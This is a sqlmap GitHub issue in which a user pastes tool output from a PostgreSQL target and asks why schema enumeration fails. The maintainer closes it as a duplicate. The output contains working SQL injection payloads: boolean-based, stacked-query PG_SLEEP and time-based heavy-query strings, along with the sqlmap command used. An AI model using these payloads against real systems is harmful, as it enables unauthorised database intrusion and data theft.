### ISSUE TITLE
on PostgreSQL you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes

### ISSUE THREAD

**Issue by ankitraj5ar** [sqlmapproject/sqlmap#5397] opened 2023-04-18 11:50 UTC
i am able to access the --banner , but able to access the --dbs or --users i getting this following error. any help

i am using this command 
sqlmap.py -u "URL" --dbs

Parameter: key (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: key=ChangeBWOnDemandURL' AND 9610=9610 AND 'hTnj'='hTnj&username=medical

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: key=ChangeBWOnDemandURL';SELECT PG_SLEEP(5)--&username=medical

    Type: time-based blind
    Title: PostgreSQL AND time-based blind (heavy query)
    Payload: key=ChangeBWOnDemandURL' AND 6843=(SELECT COUNT(*) FROM GENERATE_SERIES(1,5000000)) AND 'EZmQ'='EZmQ&username=medical
---
[17:15:02] [INFO] the back-end DBMS is PostgreSQL
web application technology: JSP, Apache
back-end DBMS: PostgreSQL
[17:15:02] [WARNING] schema names are going to be used on PostgreSQL for enumeration as the counterpart to database names on other DBMSes
[17:15:02] [INFO] fetching database (schema) names
[17:15:02] [INFO] fetching number of databases
[17:15:02] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[17:15:02] [INFO] retrieved:
[17:15:02] [WARNING] time-based comparison requires larger statistical model, please wait........................... (done)
[17:15:03] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions

[17:15:03] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[17:15:03] [ERROR] unable to retrieve the number of databases
[17:15:03] [INFO] falling back to current database
[17:15:03] [INFO] fetching current database
[17:15:03] [INFO] retrieved:
[17:15:03] [INFO] retrieved:
[17:15:03] [WARNING] on PostgreSQL you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
[17:15:03] [CRITICAL] unable to retrieve the database names
[17:15:03] [INFO] fetched data logged to text files under 'C:\Users\Ankit Raj\AppData\Local\sqlmap\output\1.1.1.1'

[*] ending @ 17:15:03 /2023-04-18/

**Comment by stamparm** [comment] 2023-04-24 12:58
duplicate of #5399

**Closed by stamparm** 2023-04-24 12:58 UTC
